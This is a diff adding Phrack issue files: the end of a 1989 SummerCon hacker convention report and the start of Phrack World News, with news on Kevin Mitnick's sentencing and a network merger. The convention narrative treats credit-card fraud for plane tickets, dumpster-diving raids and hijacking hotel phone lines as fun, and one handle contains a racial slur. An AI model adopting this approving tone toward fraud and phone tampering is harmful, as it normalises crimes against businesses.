+Control C and Erik Bloodaxe told us all about Black Ice-Con which
+had taken place the weekend prior to SummerCon '89 in Dallas,
+Texas.  The supposedly secret convention had been infiltrated by
+security agents from U.S. Sprint.  They believed that the leak
+existed on Black Ice itself, the bulletin board from which the
+con took its name and all members were invited (there were less
+than 20 people on the board).  They named who they thought the
+leak was, but discretion prevents printing his name here.  On a
+side note, Black Ice was crashed by SuperNigger and abandoned by
+the members of LOD thereafter.
+
+Erik had some interesting business cards with him.  He passed
+several of them out to interested hackers and other miscellaneous
+people at the hotel and in the St. Louis metropolitan area as
+well.  These cards featured Erik Bloodaxe and the following
+organizations;
+
+-    American Telephone & Telegraph [AT&T] -    Federal Bureau of
+Investigation [FBI] (Department of Justice) -    Secret Service
+(Department of Treasury) -    Southwestern Bell Telephone Company
+-    Tymnet (McDonnel Douglas)
+
+Erik gave Taran and I each a set of the cards as souvenirs of his
+visit.  Both of us had to work early morning shifts the next day
+so a little after midnight we decided to leave.  I finally went
+to sleep around 1 AM.
+
+
+SummerCon '89:  The Adventure Begins              Friday Morning,
+June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I woke up
+around 5 AM to begin my day.  I had arranged to work the morning
+shift 6-10 AM in order to avoid having to work the rest of the
+day and weekend.  I returned home around 10:30 AM and I began the
+final work on Phrack 27.  Although the issue date is June 20,
+1989, we did not really release the issue until June 27, due to
+complications with SummerCon '89 and other events.  All of the
+sudden I received a call from another veteran of SummerCons past,
+a person who swore that he would not appear at this year's
+convention...  TUC!
+
+He tried to convince me that he was in Florida or anywhere but
+St. Louis.  I asked him if he needed a ride from the airport to
+the hotel or something.  The call sounded local as hell, but he
+insisted on remaining consistent with his story for another few
+minutes.  Then my call waiting beeped and it was Taran King.  I
+juggled the lines for a few minutes and then had Taran call Tuc
+(who was at the Executive International) while I got ready to go
+meet him at the hotel.
+
+As I was leaving my home, I noticed something sticking to the
+front door.  It was a notice from United Parcel Service.  How
+odd.  I did not notice it at 10:30 AM when I returned home and I
+did not not hear anyone knock on the door since I had been home.
+Still, the note said that they had left my package at the
+subdivision club house.
+
+So I dropped in there and found my package... would you believe
+it came from Francis J. Haynes... Frank of "Frank and the Phunny
+Phone Call" himself and that is exactly what was inside:  A
+cassette tape sampler of Frank and the Phunny Phone Call.
+Incidentally, Frank is being mastered on to compact disc and will
+be available for sale soon.  More details on this will appear in
+Phrack World News in the near future.
+
+Eventually, I reached the hotel.  Control C and Erik Bloodaxe
+were nowhere to be found and Forest Ranger and Taran King were
+unavailable.  I found Tuc and we decided to go grab lunch and
+drive around for a while.
+
+We returned to the hotel and traded war stories about the past
+year and decided to call the hotel office to see who might have
+checked in during the past few hours.  No one we recognized was
+here yet, but there was a call for Tuc on another line.  The lady
+at the office switched the call into Tuc's room and I picked it
+up.
+
+It was Crimson Death of 618.  He wanted us to know that he was
+arriving by bus later that evening and would need a ride at about
+10:45 PM.  He also informed us that Dr. Cypher was on his way in
+and would arrived at the airport's bus terminal and take the
+shuttle to the hotel.  He was unsure about what time this would
+occur.
+
+I told him I could pick him up at the bus terminal and that I had
+to get off the phone.  I did, you see because it was at about
+this time that Tuc had opened the windows and looked out by the
+pool terrace.  Control C, Erik Bloodaxe, Forest Ranger, The
+Urvile, and a guy by the name of Phil Free (known under various
+other handles including Judas Christ) were out poolside and upon
+noticing us had run over to climb through the window into the
+room.
+
+
+A Gathering Of Phreaks                          Friday Afternoon,
+June 23, 1989 ~~~~~~~~~~~~~~~~~~~~~~ Finally the convention began
+to get underway.  Greetings were exchanged and some discussion
+about last year's convention took place.  I had brought laser
+printed copies of Phracks 21 - 26 into Tuc's room and everyone
+was interested in taking a look.  The Urvile was especially
+curious about a certain quicknote that appeared in Phrack World
+News Issue XXV/Part 3.  I would guess that the particular
+quicknote in question was number five...it was about Telenet
+security, but this is a story for another day.
+
+The phone rang and Tuc answered.  He handed the phone to Control
+C, who then disappeared without saying anything.  It was obvious
+that Lex Luthor had arrived.  However, he wished to make his
+current state of residence remain anonymous and so he decided to
+park his car someplace other than the hotel parking lot and thus
+he needed covert assistance.  After a few minutes Control C
+returned with Lex and then all of the LODies ran quickly to the
+Doom Room.  Taran King showed up around this time and then Tuc,
+FR, TK, and I joined the others.
+
+Shortly afterwards, Taran King, Erik Bloodaxe, and I decided to
+go have a listen to Frank and the Phunny Phone Call.  I had not
+played it yet and so we set up in the hotel lobby.  The first
+part of the tape was not about Frank at all.  It was a
+never-released, newly produced musical selection that seemed to
+be called "My Telephone Is Acting Crazy."  It was interesting as
+it employed different familiar telephone error messages, common
+types of recordings, and touch tones.  When the actual Frank
+messages began, we stopped the tape and left the lobby
+immediately to avoid being thrown out -- the language was a
+little too obscene for the conservative employees behind the
+desk.  So we wandered the hotel looking for a place to play the
+tape.  In the process we met Doc Holiday and Hugo Danner.
+
+We finally gained access to Tuc's room (he was with Forest
+Ranger, Phil Free, and the LOD in the Doom Room).  Doc Holiday
+and Hugo went to drop their bags off in their room and ended up
+in the Doom Room as well.  TK, EB, and I remained in Tuc's room
+to hear the rest of the tape.  There was a knock at the door...
+it was Bill From RNOC.
+
+Taran and BFR disappeared almost instantly as Erik Bloodaxe began
+to pursue Bill.  He evidently had some score to settle.  However,
+TK and BFR were gone as if they had become invisible.  Erik
+decided to finish listening to the tape.  We did and then went on
+to the Doom Room where we discovered Lucifer 666 and Synthetic
+Slug had arrived.  L666 had many stories to tell about their trip
+to St. Louis and he also brought a video camera.  His biggest
+concern was that his camera would scare the hell out of Lex...
+and to some extent it did.  You see, as it was explained to me by
+the LOD members (with Lex Luthor absent at the time) there is
+paranoia and beyond paranoia, there is Lex.
+
+
+SummerCon Craziness                             Friday Afternoon,
+June 23, 1989 ~~~~~~~~~~~~~~~~~~~ As many readers might already
+known, St. Louis is the world headquarters for McDonnell Douglas
+Aircraft, the firm that also owns Tymnet.  This was no secret to
+the Legion of Doom, who led a series of successful trashing raids
+on them as well as Southwestern Bell and IBM.  The way I heard
+it, they even took pictures.
+
+Meanwhile, after spending some time hanging out with the gang at
+the Executive International, Bill From RNOC, Taran King, Tuc, Lex
+Luthor, and I went to get a bite to eat.  We ended up at Wendy's
+because Tuc, being a vegetarian, wanted the salad bar.  We had a
+little fun harassing the staff (who still owes BFR an iced tea).
+We began to speculate on who this year's security agent would
+be... after all there is always some informant or plant at
+SummerCon -- it has become a tradition.
+
+At this point, everyone's best bet was on Dr. Cypher.  Cypher had
+admitted to having connections on the security side of things,
+had once claimed to be busted and/or retired, supposedly told
+U.S. Sprint all about Black Ice Con (to hell with discretion),
+and all in all, was the major unknown who best fit the mold set
+forth by Dan The Operator at SummerCon '87 (although his friend
+that showed up with him, Cryptic Fist fit the mold rather well
+too, but this is detailed later).  This is just what I had
+gathered from various people at the convention and are not
+necessarily my personal views.
+
+The obvious telephone security person there was from Michigan
+Bell -- Control C -- But no one was really worried about him.  He
+had been able to attend Black Ice-Con and SummerCon '88 all
+expenses paid by Michigan Bell, but he said that since his
+superiors have read the PWN reports of SummerCons past, they felt
+that this trip was pleasure, not business, and would not give him
+a free ride any longer.
+
+I hate to break this to the security folks out there, but
+honestly, do you think I would write an article and include
+information like whose computers, passwords, codes, and whatever
+were handed out and discussed?  Why create negative publicity
+like that.  Don't you all worry though... none of that EVER goes
+on at SummerCon :-)
+
+Before we left Wendy's, Tuc and BFR grabbed a stack of taco
+shells and as we journeyed towards the hotel, BFR and Tuc
+proceeded to throw parts of these shells at other vehicles and
+pedestrians.  A few minutes after we had returned, everyone began
+getting together to go pickup Android Pope (aka Cisban Evil
+Priest) at the airport.  It was 7:15 PM by now and his flight
+from New Jersey was supposed to arrive at 7:54 PM.
+
+               "Are you an agent of the FBI or Secret Service?!"
+
+This was Lucifer 666's standard question that he asked everyone
+he came into contact with at the hotel -- guests, office
+personnel, porters, and even the shuttle bus driver.  They all
+replied with a confused "no."  It seemed to take an hour to get
+the shuttle bus ready for passengers.  Bill From RNOC, Taran
+King, and I were going to just hang out at the hotel, but I was
+shanghaied on to the bus to the airport.
+
+Just before we took off, the older gentleman that was serving as
+our bus driver turned around and said, "You know how you fellas
+were asking me if I was with the FBI..."  We all froze instantly
+as he pulled out his badge.  No, he was not with the FBI, but he
+was a recently retired deputy police chief for the St.  Louis
+County Police Department.  Control C later remarked to me that
+when the driver had shown his badge, he had half expected to hear
+a loud series of clicks as the locks to all of the doors on the
+shuttle bus shut and a barrier of some sort appeared between the
+driver and the passengers... all of whom were SummerCon guests.
+
+Instead, several of the hackers, Hugo and Forest Ranger for the
+most part, began to question the retired officer about his gun
+fights.  The driver remarked how he had been shot before and even
+went so far as to show us some of his scars.  Lucifer asked, "Did
+you kill the guy who shot you?"  The driver responded,
+"Certainly."  This line of questioning went on for the duration
+of the trip.  We got to the airport and moved out.
+
+
+Erik Bloodaxe:  Missing In Action                 Friday Evening, June 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Upon entering the lower terminal of Lambert Field (St. Louis
+International Airport), this "motley crew" encountered a blonde
+bombshell named Stephanie on one of the nearby payphones.
+Control C was the first to approach her and he asked her if she
+was talking to her boyfriend.  She wasn't and so he proceeded to
+take the handset and talk to her friend.  In the meantime,
+Lucifer 666 was filming the entire affair and several members of
+the group (not including Lex or Tuc) began having their pictures
+taken with blondie.  This situation soon turned to riot as almost
+everyone wanted in on this action.  Eventually we shuffled off to
+the American Airlines ticket counter to check up on Android
+Pope's flight while Forest Ranger apologized for our behavior.
+
+The scene at the ticket counter was somewhat grim.  You see
+Android Pope was scheduled to arrive at 7:54 PM and apparently
+the flight's arrival had been delayed... until 9:00 PM at the
+earliest.  In the meantime, Forest Ranger was having a little
+chat with Erik Bloodaxe.  He told EB that the blondie chick
+thought he was a big geek and some other nasty things.  Erik
+became so depressed that he headed back to talk to her again, but
+none of us knew it at the time.
+
+So now we had to kill an hour.  We started towards the far end of
+the airport where a restaurant and bar were located.  On the way,
+we encountered some people striking against Eastern and
+Continental Airlines and handing out stickers that showed
+"Lorenzo" with a circle around his name and a line through it
+(much like a no U-turn sign or the NO FEDS pin from SummerCon
+'88).  We took a lot of those stickers and put them on
+unsuspecting people all over the airport.
+
+Upon reaching the area just outside of the bar, we found a row of
+payphones, a fancy vintage replica of a car, and a wheelchair.
+Control C hopped into the chair (deja vu of SummerCon '87
+occurred here when I remembered how Control C ended up in a
+swimming pool last time) and Lucifer 666 started driving him all
+about the airport.  The problem was that the wheelchair belonged
+to this lady who was on the payphones and when she finally
+noticed that it was missing she tracked Control and L666 down
+screaming theft.
+
+Finally we got to the bar.  We sat down and talked for a while
+watching planes take off and land.  After a few minutes I noticed
+that Erik had disappeared.  We retraced our steps all the way
+back to the payphones where we encountered blondie without any
+success whatsoever.  Then we went to the American Airlines ticket
+counter and had Erik paged.  We also did the same thing at the
+Trans World Airlines and Braniff ticket counters.
+
+Since we could not find him, about half of us decided it was time
+to head back to the hotel and let the rest of the group wait for
+Android Pope.  We all went out to the street where the buses stop
+and waited.  A very strange incident took place here.  Another
+group of guys ventured forth with a person who was blindfolded
+and handcuffed.  They said, "This is what happens when you break
+the law guys... illegal trafficking in cocaine... Columbian."
+Forest Ranger asked if they had any to spare.  Oddly enough, they
+had their own video camera and were filming this and us while we
+were filming them.  They soon disappeared into a parking garage.
+
+Eventually the bus came and picked us up.  The Urvile, Lucifer
+666, Tuc, and Doc Holiday stayed behind to search for Android
+Pope.  They caught a later shuttle bus back to the hotel.
+However, mere moments after they had arrived, Dr. Cypher showed
+up claiming he had just got off the shuttle bus.  Obviously this
+could not be true because these buses are very small and there is
+no way L666, Urvile, Tuc, DH, and AP could have missed him and
+his friend Cryptic Fist.
+
+It was around 11:00 PM when I remembered that Crimson Death was
+due at the bus station downtown.  Bill From RNOC and Taran King
+accompanied me to go pick him up and were we ever surprised when
+we saw him.  He was no longer the short little kid we had met at
+SummerCon '88.
+
+We returned to the hotel to discover that Erik Bloodaxe had
+finally made it back.  After hearing what Forest Ranger told him
+about what Stephanie had to say (calling him a geek or something
+similar), he decided to go to her again.  He walked with her to
+her gate and stayed until her plane left.  He later remarked that
+he had heard us paging him, but decided to ignore it.  After his
+return, the entire SummerCon group headed out to the midnight
+showing of the premiere day of "Batman."  L666 attempted to sneak
+his video camera into the movie, but changed his mind and did a
+"jaywalk" instead.  After the flick everyone just hung out for a
+while.  The Doom Room crew went to sleep because Control C had an
+early flight to catch the next morning and Taran and I crashed
+around 5:30 AM.
+
+
+Conference Day A.M.                             Saturday Morning, June 24, 1989
+~~~~~~~~~~~~~~~~~~~
+The hotel was trashed.  Forest Ranger and Lucifer 666 watched as
+the hotel employees were forced to clean up the mess that was
+left behind after the previous evening's activities.  One maid
+remarked, "I know my boss wants your business, but he sure as
+hell don't want all these beer cans."  Control C was gone, but he
+had performed a practical joke on Lucifer 666 and Synthetic Slug
+before he left, leaning a trashcan full of ice on their door so
+that when it was opened, all of the ice would fall into the room.
+According to Erik Bloodaxe, Control C also walked off with a jean
+jacket that did not belong to him -- No honor among hackers?
+
+Aristotle and Predat0r arrived sometime during the morning with a
+small suitcase full of TAP issues and other materials for the
+convention.  Crimson Death lit a pizza on fire in one of the
+rooms in order to perform a demonic ritual that was reminiscent
+of the first SummerCon (1987) when Lucifer 666 attempted
+(unsuccessfully) to eat fire.
+
+
+The Conference                                Saturday Afternoon, June 24, 1989
+~~~~~~~~~~~~~~
+It was at this time that Taran King, Forest Ranger, and I handed
+out the Official SummerCon '89 buttons and posters.  In addition
+to this, I handed out keychain flashlights that showed the logo
+of Ameritech as well as a few specially designed "Legion" buttons
+to the LOD members that were there.
+
+Forest Ranger got things started by welcoming everyone to the
+conference and asking them to take a seat.  Mysteriously, Dr.
+Cypher had decided not to attend the conference, but his pal
+Cryptic Fist was there with a micro-tape recorder in the pocket
+of his leather jacket (that he refused to take off even though it
+was a blistering 94 degrees).
+
+Our first speaker was Aristotle.  He talked for a while about the
+new TAP Magazine, how it worked, and how to subscribe.  He took
+quite a beating from the large amount of criticism directed at
+him because of the lack of originality in the name of the
+publication as well as not having been given official permission
+to use the name.  As it turns out, the ownership of the TAP name
+currently resides with Tuc.  Tuc was there at the conference, so
+Aristotle put the question to him, "Can I do it?"  Tuc basically
+said he thought it was ok, but he wanted to talk to Cheshire
+Catalyst about it.  The situation remains unresolved.
+
+The next speaker was Lex Luthor.  Lex discussed a topic that was
+a little more familiar to most everyone at the conference -- Code
+Abuse.   For the most part, he presented the standard methods in
+which companies try and track down code abusers and strongly
+advised that everyone not abuse codes.  He also went on to
+criticize Brew Associates for releasing a new edition of Code
+Thief.
+
+Taran and I spoke next.  For the most part we talked about Phrack
+Inc. and what lies ahead concerning the newsletter.  We also
+brought up discussion on the Internet and the plausibility of
+security agencies using "grep" to track down hackers across the
+world.  We also discussed our recent excursion through a GTE
+Central Office and what we found.
+
+The Urvile gave a short lecture on Unix hacking and then it was
+Bill From RNOC's turn to speak.  For the most part, he discussed
+2600 Meetings (that take place once a month at The Citicorp
+Center in New York City).  He spoke briefly about Eric Corley and
+the publication 2600 Magazine.  Afterwards, he played a humorous
+recording in which he engineered an insane gentleman to believe
+that he was a news reporter and got his story about computers in
+Utah taking over the world.  That concluded the regularly
+scheduled speakers.
+
+Group discussion began and the topics included:  TelePub '86,
+Scan Man, Cheshire Catalyst, The Bootleg, and Red Knight.  We
+listened to segments of Frank and The Phunny Phone Call and Group
+Bell Presents the Adventures of Dom Tuffy for a while and then
+started being really creative.  In a high spirited moment we
+formed a large human pyramid and took pictures (that are supposed
+to appear in TAP Magazine's next issue).
+
+
+Poolside and Mellow                             Saturday Evening, June 24, 1989
+~~~~~~~~~~~~~~~~~~~
+Aristotle, Predat0r, Doc Holiday, and Hugo Danner had to hit the
+road soon after the convention ended.  However, another friend
+named Stephan showed up after the conference and so did Doctor
+Cypher with ParMaster and Rabbit.  Cypher told us a story about
+how PM and Rabbit had carded plane tickets to St.  Louis and
+stayed at the Holiday Inn-West.  However, after running up huge
+tabs at the hotel, the management asked them to pay up in cash
+and would not accept their credit card numbers.  They made a
+narrow escape from the hotel and arrived at Best Western to stay
+the night.
+
+Par and Rabbit were very outgoing, they wanted to have Tuc, Lex,
+and Erik come to their yacht in New York and go sailing.  It was
+a very strange situation and parts of their story still do not
+seem to make sense even today.  However, they proceeded to "fuck
+the phones" at the hotel so that all calls going to the front
+desk would be intercepted into BFR's room.  This was not very
+pleasurable.
+
+Most people went downtown for dinner that night and then everyone
+ended up outside by the pool having a few drinks.  At one point
+in the evening, Taran, BFR, Stephan, Forest Ranger, and I went
+back to BFR's room and were followed by Erik Bloodaxe.  He
+accused Bill of being a cocaine dealer and Forest Ranger erupted,
+"THAT'S NOT COOL FUCKING WITH RNOC MAN!" and the two of them
+(Erik and FR) came very close to blows.  It was soon settled and
+the partying resumed.  A small group of us went on a mission that
+night and what we discovered is a story for another day, but it
+kept us busy until almost 6 AM.
+
+
+So Long Farewell                                          Sunday, June 25, 1989
+~~~~~~~~~~~~~~~~
+With the exception of Erik Bloodaxe, the Legion of Doom gang had
+disappeared by the time Taran and I showed up at Best Western.
+In fact, the only other hackers remaining in the vicinity were
+Forest Ranger, BFR, Stephan, L666, and Synthetic Slug as far as
+we could tell.  We said goodbye to L666 and SS and the rest of us
+(not including Erik Bloodaxe, Tuc and Crimson Death who we found
+out later were still in town) journeyed to Westport Plaza where
+we spent the rest of the afternoon until it was time for BFR and
+Stephan to catch their flights.  And that was SummerCon '89.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+The following are the people who attended SummerCon '89:  (23
+Total)
+
+             Android Pope \ Aristotle \ Bill From RNOC \ Control
+  C Crimson Death \ Cryptic Fist \ Doc Holiday \ Doctor Cypher \
+  Erik Bloodaxe
+   Forest Ranger \ Hugo Danner \ Knight Lightning \ Lex Luthor \
+     Lucifer 666 ParMaster \ Phil Free \ Predat0r \ Rabbit \
+     Stephan \ Synthetic Slug
+                         Taran King \ Tuc \ The Urvile
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Who Didn't Attend SummerCon '89... And Why!
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Ax Murderer:  "Definitely next year."
+Bad Subscript:  "Dan wouldn't pay for me this time."
+Broadway Hacker:  "I have a date that weekend."
+Cheshire Catalyst:  "I have a HAM convention."
+CompuPhreak:  "I was trying to fix my Watson."
+Eric Corley:  "It's either this or GHP."
+Cray-Z Phreaker and SkunkWorks gang:  "I was competing in a regatta."
+DarkMage:  "My hard disk drive broke and I need the cash to fix it."
+The Datamaster, Peter Pulse, Magnetic Surfer:  "It should be in New York City."
+Dave Starr:  (Disappeared off of the face of the earth again)
+Dead Lord:  "I was at camp."
+Delta-Master:  "I am going to the Galactic Hackers Party too."  (No show)
+The Disk Jockey and Shade:  "I thought it was next weekend...sorry."
+Epsilon:  "My mom said she didn't feel like going to St. Louis."
+The Executioner:  "I had a beauty shop appointment."
+Katie Hafner:  "Forest Ranger would not let me go."
+Hatchet Molly:  "I got married."
+Karl Marx:  "I had a job interview... sue me."
+The Leftist:  "<Sniff> I'm in the hospital."
+MAC???:  "Why don't you guys have it in California this year?"
+John Maxfield:  "I was there... the Holiday Inn-West, right?"
+The Mentor:  "I'll have my own in Texas instead."
+Oryan QUEST:  "I got deported."
+Phantom Phreaker and Doom Prophet:  "We went camping... with our parents."
+Phrozen Ghost and Surfer Bob:  "Scared of seeing Crimson Death."
+Promethius:  "I decided to spend the weekend with Broadway Hacker instead."
+Red Knight:  "I was in Kenya visiting relatives."
+Remington Steal and Chanda Leir:  "We'd rather be alone if you don't mind."
+Sigmund Fraud:  "I still have another 7 or 8 weeks of basic training."
+Silver Spy:  "I'll be there if I can."
+Sir Francis Drake:  "Had to get my other nostril pierced."
+The Renegade Chemist:  "I didn't feel like taking the heat for MY TAP."
+Tuc:  "I am never coming to another convention again... whoops!"
+VaxCat and Phase Shifter:  (In August) "When is that anyway?"
+Violence and The Scythian:  "We got busted by SoutherNet, but we'll be there!"
+
+Needless to say, those who missed the convention, missed out.  Plans are
+already underway for SummerCon '90 --KL
+__________________________________________________________________
diff --git a/phrack28/9.txt b/phrack28/9.txt
new file mode 100644
index 0000000..c332b76
--- /dev/null
+++ b/phrack28/9.txt
@@ -0,0 +1,550 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #9 of 12
+
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+            PWN                                                 PWN
+            PWN        P h r a c k   W o r l d   N e w s        PWN
+            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
+            PWN               Issue XXVIII/Part 1               PWN
+            PWN                                                 PWN
+            PWN                 October 7, 1989                 PWN
+            PWN                                                 PWN
+            PWN          Created, Written, and Edited           PWN
+            PWN               by Knight Lightning               PWN
+            PWN                                                 PWN
+            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+                 Welcome to Issue XXVIII of Phrack World News!
+
+This issue of Phrack World News contains stories and articles
+detailing events from June - October, 1989 and features Bellcore,
+Chalisti, Chaos Computer Club, Clifford Stoll, The Disk Jockey,
+Fry Guy, The Grim Phreaker, Legion of Doom, The Leftist, Major
+Havoc, Kevin Mitnick, Robert Morris, Oryan QUEST, The Prophet,
+Red Rebel, Shadow Stalker, Shadow 2600, Terra, The Urvile, and
+much more so keep reading.
+
+        "The Real Future Is Behind You... And It's Only The
+Beginning!"
+_______________________________________________________________________________
+
+Judge Suggests Computer Hacker Undergo Counseling
+July 17, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Karen E. Klein (New York Times)
+
+LOS ANGELES -- A federal judge has suggested that Los Angeles
+computer hacker Kevin Mitnick be sentenced to a one-year
+residential treatment program to break his "computer addiction."
+
+Although she did not finalize her sentence, U.S. District Judge
+Mariana R.  Pfaelzer said Monday that she thought Mitnick had
+some problems that would
+benefit from counseling.
+
+Pfaelzer will actually pass sentence at a hearing set for
+Tuesday, July 18.
+
+The idea that a computer "junkie" who cannot control his urge to
+break into computers could be helped with a program similar to
+Alcoholics Anonymous is a new one, Harriet Rossetto, director of
+the treatment program, told the judge.
+
+"His behavior is an impulse disorder," Rossetto said.  "The
+disease is the addiction, whether it be drugs, alcohol, gambling,
+hacking, money or power."
+
+Rossetto, who was contacted by Mitnick's family, said Mitnick
+would be the first person addicted to computer crime to be
+treated in the Bet T'shuvah program , a 20-bed residential
+treatment program for Jewish criminal offenders.
+
+"It's not willful conduct, what Kevin does," she said.  "He's
+tried to control his behavior but hacking gives him a sense of
+power, makes him feel like somebody when he's depressed or he's
+lost a job."
+
+Mitnick, age 25, has been in federal prison for seven months
+since his arrest
+last December on computer fraud charges.
+
+He pleaded guilty in May to possessing 16 unauthorized MCI
+long-distance codes and to stealing a computer security program
+from the Digital Equipment Corporation in Massachusetts.
+
+Mitnick has been described in court as a computer whiz who could
+break into secured systems and change telephone or school records
+at will.  He told the judge on Monday, July 17 that he wants to
+stop hacking.
+
+"I sincerely want to change my life around and be productive
+rather than destructive," Mitnick said.
+
+"With counseling to break the addictive pattern I feel I have
+towards computer hacking, I can take an active role and I don't
+have to have the compulsive behavior again."
+
+Assistant U.S. Attorney James R. Asperger said that the
+government does not oppose Mitnick's release from prison to be
+treated at Bet T'shuvah.
+
+"The judge has taken this case very seriously.  It shows computer
+hacking is not like a Nintendo game," Asperger said.
+
+Mitnick has cooperated with FBI investigators since his pleaded
+guilty and helped bring charges against his former best friend,
+Leonard DiCicco, 23, of Calabasas, Asperger said.
+
+DiCicco, who initially tipped the FBI to Mitnick's crimes, has
+agreed to plead guilty to a charge of aiding and abetting the
+transportation of a stolen computer program.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Authorities Backed Away From Original Allegations
+July 23, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+by Karen E. Klein (New York Times)
+
+LOS ANGELES -- Shortly after computer hacker Kevin Mitnick was
+arrested last December (1988), he was characterized as an extreme
+threat who could wreak electronic chaos if he got near so much as
+a telephone without supervision.
+
+Police and FBI agents started trying to corroborate the flurry of
+rumors that arose about the malicious actions of the computer
+whiz from suburban Panorama City, whose case attracted national
+attention.
+
+Three judges denied Mitnick, age 25, bail on the ground that he
+was a danger to society and ordered him held in a high-security
+jail cell.
+
+But after separating the Mitnick myth from the reality,
+authorities backed away from many of their original allegations.
+
+"A lot of the stories we originally heard just didn't pan out, so
+we had to give him the benefit of the doubt," said James R.
+Asperger, the assistant U.S. attorney who handled Mitnick's case.
+
+Mitnick, pudgy and nervous, appeared in court last week to
+apologize for his crimes and to ask for treatment to help break
+his compulsive "addiction" to computers.
+
+U.S. District Judge Mariana R. Pfaelzer sentenced him to serve
+one year in
+prison -- including the nearly eight months he already has served
+-- and then to undergo six months of counseling and treatment
+similar to that given to alcoholics or drug addicts.
+
+"I think he has problems that would benefit greatly from this
+kind of therapy," Pfaelzer said.  "I want him to spend as much
+time as possible in counseling."
+
+The case that began with a bang ended with Asperger pointing out
+that the one-year prison term is the stiffest sentence ever
+handed out in a computer fraud case.
+
+Mitnick originally was accused of using unauthorized MCI
+long-distance codes to tap into Leeds University computers in
+England and of stealing a $4 million computer security system
+from the Digital Equipment Corporation in Massachusetts.
+
+He ultimately agreed to plead guilty to possessing 16
+unauthorized MCI long-distance codes and to stealing the computer
+security program.  The other charges were dismissed.
+
+Alan Rubin, Mitnick's lawyer, said he felt vindicated by the
+outcome of the case.
+
+Rubin contended from the start that computerphobia and adolescent
+exaggeration led authorities to mistakenly brand Mitnick a
+malicious criminal.
+
+"Once the snowball starts rolling, you can't stop it," said
+Rubin, who waged an unsuccessful campaign up to the federal
+appeals court to get bail for his client.
+
+Far from being serious, Rubin said, Mitnick's actions were mostly
+immature, adolescent pranks.
+
+He pointed to evidence that Mitnick was able to electronically
+cut off telephone service to people he was angry with and once
+sent an enemy a $30,000 hospital telephone bill.
+
+"It was the computer equivalent of sending your friend 14
+pizzas," he said.
+
+Many of the legends surrounding Mitnick came from the subculture
+of computer hackers -- and specifically from a man who was once
+Mitnick's best friend, Leonard Mitchell DiCicco, age 23, of
+Calabasas, California.
+
+DiCicco, who had a falling out with Mitnick over a $100 bet, told
+computer security specialists at the Digital Equipment
+Corporation that Mitnick had been trespassing on their system.
+
+They in turn contacted the FBI agents, who arrested Mitnick.
+
+What DiCicco told investigators may or may not have been entirely
+truthful, Rubin said.
+
+"I have no idea what his motives were," Rubin said.
+
+But DiCicco, who alerted authorities to Mitnick's crime, had the
+tables turned on him after the government refused to grant him
+absolute immunity for his testimony against Mitnick.
+
+When the prosecution said they might charge him with a crime,
+DiCicco clammed up and refused to cooperate any further.  But
+from his prison cell, Mitnick agreed to cooperate and provided
+enough incriminating evidence for the government to charge
+DiCicco.
+
+DiCicco is expected to plead guilty to a charge of aiding and
+abetting the interstate transportation of stolen property -- the
+computer security program -- on Monday.
+
+Asperger said he was not sure whether DiCicco would get a
+sentence similar to Mitnick's.
+
+"Although they were friends and partners in computer hacking,
+(DiCicco) appeared to play a subordinate role (in the crime),"
+Asperger said.
+
+Other rumors about Mitnick's conduct came from fellow hackers,
+who may have blown the stories out of proportion.
+
+"It's a very strange sub-culture, with a lot of jealousies,"
+Rubin said.  "Part of it is bragging about how macho you are and
+what systems you've broken into.  It's very immature in a lot of
+ways."
+
+But prosecutors, citing Mitnick's various scrapes with computer
+misconduct since he was 13, aren't willing to let him off the
+hook entirely.
+
+"I think there's some substance to these things (the rumors that
+arose in Mitnick's case), an awful lot of them," said Los Angeles
+FBI chief Lawrence Lawler, who is a computer buff himself and
+followed Mitnick's case closely.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+If you are looking for other articles about Kevin David Mitnick aka Condor
+please refer to;
+
+"Pacific Bell Means Business"                     (10/06/88) PWN XXI. . .Part 1
+"Dangerous Hacker Is Captured"                    (No Date ) PWN XXII . .Part 1
+"Ex-Computer Whiz Kid Held On New Fraud Counts"   (12/16/88) PWN XXII . .Part 1
+"Dangerous Keyboard Artist"                       (12/20/88) PWN XXII . .Part 1
+"Armed With A Keyboard And Considered Dangerous"  (12/28/88) PWN XXIII. .Part 1
+"Dark Side Hacker Seen As Electronic Terrorist"   (01/08/89) PWN XXIII. .Part 1
+"Mitnick Plea Bargains"                           (03/16/89) PWN XXV. . .Part 1
+"Mitnick Plea Bargain Rejected As Too Lenient"    (04/25/89) PWN XXVII. .Part 1
+"Computer Hacker Working On Another Plea Bargain" (05/06/89) PWN XXVII. .Part 1
+"Mitnick Update"                                  (05/10/89) PWN XXVII. .Part 1
+"Kenneth Siani Speaks Out About Kevin Mitnick"    (05/23/89) PWN XXVII. .Part 1
+_______________________________________________________________________________
+
+BITNET/CSNET Announce Merger and Formation of CREN              August 18, 1989
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Washington, DC
+-- Two of the nation's leading academic and research computer
+networks announced today that final steps are being taken to
+merge their organizations.
+
+Ira Fuchs, President of BITNET, and Bernard Galler, Chairman of
+CSNET, jointly reported that the two networks, which together
+include 600 colleges, universities, government agencies, and
+private sector research organizations, will unite to form the
+Corporation for Research and Educational Networking, CREN.
+
+Galler, a Professor of Electrical Engineering and Computer
+Science at the University of Michigan, commented:  "The aims of
+CSNET and BITNET -- to support and promote the use of computer
+networks on campuses and within research organizations -- have
+converged over the last several years.  We believe that by
+bringing these two networks into a single organization, we will
+be able to provide better service to our network users and more
+effectively participate in the fast-changing national network
